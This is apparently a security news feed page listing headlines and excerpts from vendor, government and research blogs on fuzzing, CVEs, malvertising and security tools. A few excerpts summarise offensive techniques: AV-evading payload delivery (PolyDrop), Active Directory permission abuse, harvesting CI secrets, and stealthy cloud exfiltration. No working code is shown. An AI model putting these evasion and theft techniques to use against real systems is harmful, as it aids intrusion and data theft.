Posted by Greg Mucci, Product Manager, Artifact Analysis, Oliver Chang, Senior Staff Engineering, OSV, and Charl de Nysschen, Product Manager OSVDevOps teams dedicated to securing their supply chain and predicting potential risks consistently face novel threats. Fortunately, they can now improve their image and container security by harnessing Google-grade vulnerability scanning, which offers expanded open-source coverage. A significant benefit of utilizing Google Cloud Platform is its integrated security tools, including Artifact Analysis. This scanning service leverages the same infrastructure that Google depends on to monitor vulnerabilities within its internal systems and software supply chains.Artifact Analysis has recently expanded its scanning coverage to eight additional language packages,...
http://security.googleblog.com/2024/12/google-cloud-expands-vulnerability.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scanning For Credentials, and BotPoke Changes IPs Again
Nearly 50% of observed traffic is looking for accidentally exposed data.
https://www.f5.com/labs/articles/threat-intelligence/scanning-for-credentials-and-botpoke-changes-ips-again
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing the launch of Vanir: Open-source Security Patch Validation
Posted by Hyunwook Baek, Duy Truong, Justin Dunlap and Lauren Stan from Android Security and Privacy, and Oliver Chang with the Google Open Source Security TeamToday, we are announcing the availability of Vanir, a new open-source security patch validation tool. Introduced at Android Bootcamp in April, Vanir gives Android platform developers the power to quickly and efficiently scan their custom platform code for missing security patches and identify applicable available patches. Vanir significantly accelerates patch validation by automating this process, allowing OEMs to ensure devices are protected with critical security updates much faster than traditional methods. This strengthens the security of the Android ecosystem, helping to keep Android users around the world safe. By open-sourcing...
http://security.googleblog.com/2024/12/announcing-launch-of-vanir-open-source.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data Pipeline Challenges of Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Introduction In this post, we talk with Dr. Xiaowei Huang and Dr. Yi Dong (University of Liverpool) and Sikha Pentyala (University of Washington Tacoma), who were winners in the UK-US PETs Prize Challenges . We discuss real-world data
https://www.nist.gov/blogs/cybersecurity-insights/data-pipeline-challenges-privacy-preserving-federated-learning
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL: WriteDacl
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the WriteDacl permission in Active Directory environments. Attackers can abuse The post Abusing AD-DACL: WriteDacl appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-writedacl/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Predictions 2025: The Future of Cybersecurity Unveiled
The digital world is evolving at breakneck speed. In 2025, we're set to witness transformative changes in cybersecurity that will redefine trust, security, and how we navigate our digital lives. Here's what we see coming: Read the full blog to explore the trends in depth. The future of cybersecurity will demand both solutions and vigilance. […] The post Predictions 2025: The Future of Cybersecurity Unveiled appeared first on Avast Threat Labs.
https://decoded.avast.io/threatintel/predictions-2025-the-future-of-cybersecurity-unveiled/?utm_source=rss&utm_medium=rss&utm_campaign=predictions-2025-the-future-of-cybersecurity-unveiled
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

My Upcoming SANS Classes!
I will be teaching two SANS ICS515 classes at upcoming events. You can attend in person or virtually at: San Francisco (Live and Online) Jan 27: https://www.sans.org/cyber-security-courses/ics-visibility-detection-response/ Dallas, TX (Live and Online) Mar 24: https://www.sans.org/cyber-security-courses/ics-visibility-detection-response/
https://tisiphone.net/2024/12/03/my-upcoming-sans-classes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Some of my favorite podcast appearances in 2024
And, without further ado, here are some of the fun, smart people I have gotten to speak to on podcasts this year! Yes, blog aside, I’ve been busy! Cyber Uncut: Making your ICS/OT environments cyber secure, with Dragos' Lesley Carhart Cyber Security Weekly Podcast: Episode 413 – Operational Technology (OT) Cybersecurity – Episode 4 Breaking […]
https://tisiphone.net/2024/12/03/some-of-my-favorite-podcast-appearances-in-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Some of my favorite talks in 2024
Hello, I understand I have been terribly delinquent in posting, so I wanted to share in the interim, some of my favorite talks of the past year. I hope you enjoy, and look forward to seeing you soon! I spoke to DomainTools about the current state of Industrial Cybersecurity and what I’m seeing in the […]
https://tisiphone.net/2024/12/03/some-of-my-favorite-talks-in-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Harvesting GitLab Pipeline Secrets
TLDR: Scan GitLab job logs for credentials using https://github.com/CompassSecurity/pipeleak Many organizations use (self-hosted) GitLab instances to manage their source code and a lot of infrastructure is managed in code (IaC), thus these configurations must be source-controlled as well, putting a lot of responsibility on the source code platform in use. Often deployments are automated using CI/CD […]
https://blog.compass-security.com/2024/12/harvesting-gitlab-pipeline-secrets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zero Trust Architecture
Zero trust security takes an “never trust, always verify” approach to access control. Access is only granted once an individual’s identity and context have been confirmed through multifactor authentication and... The post Zero Trust Architecture  appeared first on Hacker Combat.
https://www.hackercombat.com/zero-trust-architecture/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is a Security Operations Center (SOC)?
A Security Operations Center (SOC) specializes in monitoring and analyzing data to detect cyber threats and prevent attacks from them. They work to sort actual threats from false positives before... The post What Is a Security Operations Center (SOC)? appeared first on Hacker Combat.
https://www.hackercombat.com/soc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

XDR vs SIEM Security Information and Event Management
The Extended Detection and Response Platform (XDR) ingestion and correlation technology captures and correlates high-fidelity data across your security layers, such as endpoint, network, logs, cloud services and identities to... The post XDR vs SIEM Security Information and Event Management appeared first on Hacker Combat.
https://www.hackercombat.com/xdr-vs-siem/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Best Free EDR for Windows PC
Endpoint detection and response (EDR) tools offer businesses that employ hybrid work models or remote employees an extra layer of cybersecurity protection. Utilizing artificial intelligence (AI) and machine learning (ML),... The post Best Free EDR for Windows PC appeared first on Hacker Combat.
https://www.hackercombat.com/best-free-edr-tools-for-windows-pc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL: GenericWrite
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the GenericWrite permission in Active Directory environments. This permission can The post Abusing AD-DACL: GenericWrite appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-genericwrite/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Free EDR Solutions for Home Users in 2025
EDR can detect and respond to emerging and advanced cyber threats quickly and efficiently, making it an essential component of modern business ecosystems. Beyond signature-based detection capabilities, its features go... The post Free EDR Solutions for Home Users in 2025 appeared first on Hacker Combat.
https://www.hackercombat.com/free-edr-solutions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BotPoke Scanner Switches IP
Our top talker changes up their infrastructure, and CVE-2023-1389 continues to hold the top spot.
https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Simple macOS kernel extension fuzzing in userspace with IDA and TinyInst
Posted by Ivan Fratric, Google Project Zero Recently, one of the projects I was involved in had to do with video decoding on Apple platforms, specifically AV1 decoding. On Apple devices that support AV1 video format (starting from Apple A17 iOS / M3 macOS), decoding is done in hardware. However, despite this, during decoding, a large part of the AV1 format parsing happens in software, inside the kernel, more specifically inside the AppleAVD kernel extension (or at least, that used to be the case in macOS 14/ iOS 17). As fuzzing is one of the techniques we employ regularly, the question of how to effectively fuzz this code inevitably came up. It should be noted that I wasn’t the first person to look into the problem of Apple kernel extension fuzzing, so before going...
https://googleprojectzero.blogspot.com/2024/11/simple-macos-kernel-extension-fuzzing.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Look Back: Insights from Our Managed Bug Bounty Program
At Compass Security, we are proud to offer a fully managed bug bounty program tailored to the needs of both SMEs and larger enterprises. From scoping to payout, we manage every aspect of the process to ensure a seamless experience for our customers and valued hunters. In this blog post, we'll take a look at our journey since the launch of our service in October 2023, highlighting key milestones, metrics and learnings gathered along the way.
https://blog.compass-security.com/2024/11/a-look-back-insights-from-our-managed-bug-bounty-program/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Friday Versus The Bots
What can last year’s Black Friday shopping trends teach us about expected attacker behavior during the 2024 holiday shopping season?
https://www.f5.com/labs/articles/threat-intelligence/black-friday-versus-the-bots
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Kicking-Off with a December 4th Workshop, NIST is Revisiting and Revising Foundational Cybersecurity Activities for IoT Device Manufacturers, NIST IR 8259!
In May 2020, NIST published Foundational Cybersecurity Activities for IoT Device Manufacturers (NIST IR 8259), which describes recommended cybersecurity activities that manufacturers should consider performing before their IoT devices are sold to customers. These foundational cybersecurity activities can help manufacturers lessen the cybersecurity-related efforts needed by customers, which in turn can reduce the prevalence and severity of IoT device compromises and the attacks performed using compromised devices. In the nearly five years since this document was released, it has been published
https://www.nist.gov/blogs/cybersecurity-insights/kicking-december-4th-workshop-nist-revisiting-and-revising-foundational
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Leveling Up Fuzzing: Finding more vulnerabilities with AI
Posted by Oliver Chang, Dongge Liu and Jonathan Metzman, Google Open Source Security TeamRecently, OSS-Fuzz reported 26 new vulnerabilities to open source project maintainers, including one vulnerability in the critical OpenSSL library (CVE-2024-9143) that underpins much of internet infrastructure. The reports themselves aren't unusual—we've reported and helped maintainers fix over 11,000 vulnerabilities in the 8 years of the project. But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets. The OpenSSL CVE is one of the first vulnerabilities in a critical piece of software that was discovered by LLMs, adding another real-world example to a recent Google discovery of an exploitable...
http://security.googleblog.com/2024/11/leveling-up-fuzzing-finding-more.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Gen Q3/2024 Threat Report
The third quarter threat report is here—and it's packed with answers. Our Threat Labs team had uncovered some heavy stories behind the stats, exposing the relentless tactics shaping today's threat landscape. Here's what you need to know: This is just the surface. Read the full report and see how our Threat Labs team is relentlessly […] The post Gen Q3/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/gen-q3-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=gen-q3-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Inside Bitdefender Labs' Investigation of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta's social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unlocking Cybersecurity Talent: The Power of Apprenticeships
Cybersecurity is a fast-growing field, with a constant need for skilled professionals. But unlike other professions — like medicine or aviation — there's no clear-cut pathway to qualifying for cybersecurity positions. For employers and job seekers alike, this can make the journey to building a team (or entering a successful cybersecurity career) feel uncertain. Enter the registered apprenticeship program — a proven method for developing skilled talent in cybersecurity that benefits both the employer and the new professional. Let's commit to supporting this important talent development approach
https://www.nist.gov/blogs/cybersecurity-insights/unlocking-cybersecurity-talent-power-apprenticeships
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Retrofitting spatial safety to hundreds of millions of lines of C++
Posted by Alex Rebert and Max Shavrick, Security Foundations, and Kinuko Yasuda, Core Developer Attackers regularly exploit spatial memory safety vulnerabilities, which occur when code accesses a memory allocation outside of its intended bounds, to compromise systems and sensitive data. These vulnerabilities represent a major security risk to users.  Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade: Breakdown of memory safety CVEs exploited in the wild by vulnerability class.1 Google is taking a comprehensive approach to memory safety. A key element of our strategy focuses on Safe Coding and using memory-safe languages in new code. This leads...
http://security.googleblog.com/2024/11/retrofitting-spatial-safety-to-hundreds.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Safer with Google: New intelligent, real-time protections on Android to keep you safe
Posted by Lyubov Farafonova, Product Manager and Steve Kafka, Group Product Manager, Android User safety is at the heart of everything we do at Google. Our mission to make technology helpful for everyone means building features that protect you while keeping your privacy top of mind. From Gmail's defenses that stop more than 99.9% of spam, phishing and malware, to Google Messages' advanced security that protects users from 2 billion suspicious messages a month and beyond, we're constantly developing and expanding protection features that help keep you safe. We're introducing two new real-time protection features that enhance your safety, all while safeguarding your privacy: Scam Detection in Phone by Google to protect you from scams and fraud, and Google Play Protect live threat detection...
http://security.googleblog.com/2024/11/new-real-time-protections-on-Android.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-ecosystem
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with data.all (Multiple CVEs)
Publication Date: 2024/11/8 4:00 PM PDT Data.all is an open source development framework to help customers build a data marketplace on AWS. We have identified the following issues within data.all version 1.0.0 through 2.6.0. On November 8, 2024, we released a fix and recommend customers upgrade to version 2.6.1 or later and ensure any forked or derivative code are patched to incorporate the new fixes. CVE-2024-52311 relates to an issue where data.all does not invalidate authentication token upon user logout. CVE-2024-52312 relates to an issue where data.all authenticated users can perform restricted operations against DataSets and Environments. CVE-2024-52313 relates to an issue where data.all authenticated users can obtain incorrect object level authorizations. CVE-2024-52314...
https://aws.amazon.com/security/security-bulletins/AWS-2024-013/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code
Posted by the Big Sleep team Introduction In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind. Today, we're excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found...
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Repo swatting attack deletes/blocks GitHub and GitLab accounts
A technique called "repo swatting" allows attackers to delete GitHub and block GitLab accounts by exploiting file upload features and abuse reporting mechanisms. Attackers upload malicious files to a target's repository, then report the account for hosting malicious content, potentially resulting in account deletion. The vulnerability was partially mitigated by October 2024 via changes in upload URL paths and requirement for each uploader to be authenticated (in GitHub).
https://www.cloudvulndb.org/repo-swatting-attack-deletes-github-gitlab-accounts
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Karma connection in Chrome Web Store
Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users' every move to some Amazon cloud server. But that wasn't all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don't appear to be malicious yet. While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than...
https://palant.info/2024/10/30/the-karma-connection-in-chrome-web-store/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unmasking the SYS01 Infostealer Threat: Bitdefender Labs Tracks Global Malvertising Campaign Targeting Meta Business Pages
In a world ran by advertising, businesses and organizations are not the only ones using this powerful tool. Cybercriminals have a knack for exploiting the engine that powers online platforms by corrupting the vast reach of advertising to distribute malware en masse. While legitimate businesses rely on ads to reach new audiences, hackers exploit these platforms to trick users into downloading harmful software. Malicious ads often seem to promote legitimate software, streaming services, or produc
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Email, Email on the Wall, Who Sent You, After All?
During Business Email Comproise (BEC) engagements we often have to analyze the provenance of emails. According to the FBI's Internet Crime Report, BEC is one of the most financially damaging attacks, even surpassing ransomware in terms of losses. But how can we know all of this? Through email headers! This blog post tries to shed some light on the information contained within emails, what it means, and what can be done to prevent this type of attack.
https://blog.compass-security.com/2024/10/email-email-on-the-wall-who-sent-you-after-all/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Staff Stories Spotlight Series: Cybersecurity Awareness Month 2024
This blog is part of a larger NIST series during the month of October for Cybersecurity Awareness Month , called 'Staff Stories Spotlight.' Throughout the month of October this year, Q&A style blogs will be published featuring some of our unique staff members who have interesting backgrounds, stories to tell, and projects in the world of cybersecurity. This year's Cybersecurity Awareness Month theme is ‘Secure our World.' How does this theme resonate with you, as someone working in cybersecurity? Now more than ever, the use of technology is central to our lives. It is the means by which we are
https://www.nist.gov/blogs/cybersecurity-insights/staff-stories-spotlight-series-cybersecurity-awareness-month-2024-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cloud Security Essentials
Cloud security involves employing perimeter defenses like firewalls, IDPSs and VPNs as well as guaranteeing isolation through network segmentation and virtual LANs while monitoring traffic for anomalies and threats –... The post Cloud Security Essentials appeared first on Hacker Combat.
https://www.hackercombat.com/cloud-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Antivirus Software
Antivirus software protects devices against viruses, malware, and other cyberthreats by detecting, quarantining, and deleting malicious code. Modern antivirus products also offer additional security features such as password protection, identity... The post Antivirus Software appeared first on Hacker Combat.
https://www.hackercombat.com/antivirus-software/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Three Ways AI Can Hack the U.S. Election
The growing capability of AI content poses three very real threats to modern elections. We explain each, and take a glimpse at a possible solution to the growing AIpocalypse.
https://www.f5.com/labs/articles/cisotociso/three-ways-ai-can-hack-the-us-election
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #4: Hives and the registry layout
Posted by Mateusz Jurczyk, Google Project Zero To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry really works internally, things may get confusing really fast. What are hives? How do they map or relate to the top-level keys? Why are some HKEY root keys pointing inside of other root keys (e.g. HKCU being located under HKU)? These are all valid questions, but they are difficult to answer without fully understanding the interactions between the user-mode Registry API and the kernel-mode registry...
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Protect Against Ransomware Attacks?
Criminal hackers employ ransomware attacks against their targets by encrypting their data and demanding that a ransom be paid within an allotted timeframe or risk losing it forever. When an... The post How to Protect Against Ransomware Attacks? appeared first on Hacker Combat.
https://www.hackercombat.com/protect-against-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS CDK Bucket Squatting Risk
The AWS Cloud Development Kit (CDK) is a way of deploying infrastructure-as-code. The vulnerability involves AWS CDK's use of a predictable S3 bucket name format (cdk-{Qualifier}-assets-{Account-ID}-{Region}), where the default “random” qualifier (hnb659fds) is common and easily guessed. If an AWS customer deletes this bucket and reuses CDK, an attacker who claims the bucket can inject malicious CloudFormation templates, potentially gaining admin access. Attackers supposedly only need the AWS account ID to prepare the bucket in various regions, exploiting the default naming convention. However, it is important to note that the additional conditions greatly lower the likelihood of exploitation. The victim must use the CDK, having deleted the bucket, and then subsequently attempt to...
https://www.cloudvulndb.org/aws-cdk-squatting
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

IoT Assignment Completed! Report on Barriers to U.S. IoT Adoption
The 16 members of the NIST-managed Internet of Things (IoT) Advisory Board have completed their report on barriers to the U.S. receiving the benefits of IoT adoption, along with their recommendations for overcoming those barriers. As Benson Chan (Chair) and Dan Caprio (Vice Chair) of the IoT Advisory Board state in the report: “The United States is in the early stages of a profound transformation, one that is driven by economic, societal, and cultural innovations brought about by the IoT. These innovations intertwine connectivity and digital innovation with the opportunity to drive a
https://www.nist.gov/blogs/cybersecurity-insights/iot-assignment-completed-report-barriers-us-iot-adoption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-8901 - missing JWT issuer and signer validation in aws-alb-route-directive-adapter-for-istio
Publication Date: 2024/10/21 4:00 PM PDT The AWS ALB Route Directive Adapter For Istio repo provides an OIDC authentication mechanism that was integrated into the open source Kubeflow project. The adapter uses JWT for authentication, but lacks proper signer and issuer validation. In deployments of ALB that ignore security best practices, where ALB targets are directly exposed to internet traffic, an actor can provide a JWT signed by an untrusted entity in order to spoof OIDC-federated sessions and successfully bypass authentication. Affected versions: v1.0, v1.1 Resolution The repository/package has been deprecated, is End of Life, and is no longer actively supported. Workarounds As a security best practice, ensure that your ELB targets (e.g. EC2 Instances, Fargate...
https://aws.amazon.com/security/security-bulletins/AWS-2024-011/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-10125 - missing JWT issuer and signer validation in aws-alb-identity-aspnetcore
Publication Date: 2024/10/21 4:00 PM PDT Description: The Amazon.ApplicationLoadBalancer.Identity.AspNetCore repo contains Middleware that can be used in conjunction with the Application Load Balancer (ALB) OpenId Connect integration and can be used in any ASP.NET Core deployment scenario, including AWS Fargate, Amazon Elastic Kubernetes Service (Amazon EKS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Compute Cloud (Amazon EC2), and AWS Lambda. In the JWT handling code, it performs signature validation but fails to validate the JWT issuer and signer identity. The signer omission, if combined with a scenario where the infrastructure owner allows internet traffic to the ALB targets (not a recommended configuration), can allow for JWT signing by an untrusted entity...
https://aws.amazon.com/security/security-bulletins/AWS-2024-012/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Continued Intense Scanning From One IP in Lithuania
Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-september-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Missing JWT issuer and signer validation in ALB middleware

https://www.cloudvulndb.org/missing-jwt-issuer
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data exfil via VPC endpoint denials in CloudTrail
CloudTrail delivered events to the resource owner and API caller even when the API action was denied by the VPC endpoint policy. This could have enabled a stealthy data exfiltration method in cases where an attacker had previously compromised a VPC, by smuggling data through the user agent field in denied requests.
https://www.cloudvulndb.org/vpc-endpoint-log-data-exfil
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Protecting Your Website From DDoS Attack
Distributed denial-of-service attacks pose an increasing threat to organizations, with even some of the largest firms suffering significant disruptions from such attacks. Attackers use botnets of compromised IoT devices to... The post Protecting Your Website From DDoS Attack appeared first on Hacker Combat.
https://www.hackercombat.com/ddos-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Subdomain Takeover Vulnerability in GitLab Pages
A vulnerability in GitLab Pages allowed attackers to take over dangling custom domains pointing to 'instanceX.gitlab.io'. The issue occured when adding an unverified custom domain to GitLab Pages, which serves content for 7 days before disabling. This could lead to cookie stealing, phishing campaigns, and bypassing of Content-Security Policies and CORS.
https://www.cloudvulndb.org/subdomain-takeover-vulnerability-gitlab-pages
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Effective Fuzzing: A Dav1d Case Study
Guest post by Nick Galloway, Senior Security Engineer, 20% time on Project Zero Late in 2023, while working on a 20% project with Project Zero, I found an integer overflow in the dav1d AV1 video decoder. That integer overflow leads to an out-of-bounds write to memory. Dav1d 1.4.0 patched this, and it was assigned CVE-2024-1580. After the disclosure, I received some questions about how this issue was discovered, since dav1d is already being fuzzed by at least oss-fuzz. This blog post explains what happened. It’s a useful case study in how to construct fuzzers to exercise as much code as possible. But first, some background...BackgroundDav1d Dav1d is a highly-optimized AV1 decoder. AV1 is a royalty-free video coding format developed by the Alliance...
https://googleprojectzero.blogspot.com/2024/10/effective-fuzzing-dav1d-case-study.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with NVIDIA Container Toolkit (CVE-2024-0132, CVE-2024-0133)
Publication Date: 2024/10/01 6:35 PM PDT AWS is aware of CVE-2024-0132 and CVE-2024-0133, issues affecting the NVIDIA container toolkit 1.16. At this time, the following services require customer action. If we become aware of additional impact, we will update this bulletin. Amazon Elastic Container Service (Amazon ECS) Amazon ECS has released updated ECS GPU-optimized Amazon Machine Images (AMIs) with the patched NVIDIA container toolkit v1.16.2. We recommend that ECS customers update to these AMIs (or the latest available). Additional information on the ECS-optimized AMI is available at in our "Amazon ECS-optimized Linux AMIs" developer guide. Amazon Elastic Kubernetes Service (Amazon EKS) Amazon EKS has released updated EKS GPU-optimized Amazon Machine Images...
https://aws.amazon.com/security/security-bulletins/AWS-2024-010/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lies, damned lies, and Impact Hero (refoorest, allcolibri)
Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven't been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment. Colibri Hero (also known as allcolibri) is a company with a noble mission: We want to create a world where organizations can make a positive impact on people and communities. One of the company's products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website: Plantation financed by our partners So the users merely need to have the...
https://palant.info/2024/10/01/lies-damned-lies-and-impact-hero-refoorest-allcolibri/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits
SafeLine is a self-hosted WAF(Web Application Firewall) to protect your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, os command injection, CRLF injection, ldap injection, xpath injection, RCE, XXE, SSRF, path traversal, backdoor, bruteforce, http-flood, bot abused, among others. How It Works By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass...
http://www.kitploit.com/2024/09/safeline-serve-as-reverse-proxy-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit
BYOSI - Bring-Your-Own-Script-Interpreter - Leveraging the abuse of trusted applications, one is able to deliver a compatible script interpreter for a Windows, Mac, or Linux system as well as malicious source code in the form of the specific script interpreter of choice. Once both the malicious source code and the trusted script interpeter are safely written to the target system, one could simply execute said source code via the trusted script interpreter. PolyDrop - Leverages thirteen scripting languages to perform the above attack. The following langues are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp - deno All of these languages were allowed to completely execute, and...
http://www.kitploit.com/2024/09/polydrop-byosi-bring-your-own-script.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Secator - The Pentester'S Swiss Knife
secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers. Features Curated list of commands Unified input options Unified output schema CLI and library usage Distributed options with Celery Complexity from simple tasks to complex workflows Customizable Supported tools secator integrates the following tools: Name Description Category httpx Fast HTTP prober. http cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler gospider Fast web spider written in Go. http/crawler katana Next-generation crawling...
http://www.kitploit.com/2024/09/secator-pentesters-swiss-knife.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking
The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking. About the Damn Vulnerable Drone What is the Damn Vulnerable Drone? The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems. Why was it built? The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts....
http://www.kitploit.com/2024/09/damn-vulnerable-drone-intentionally.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add
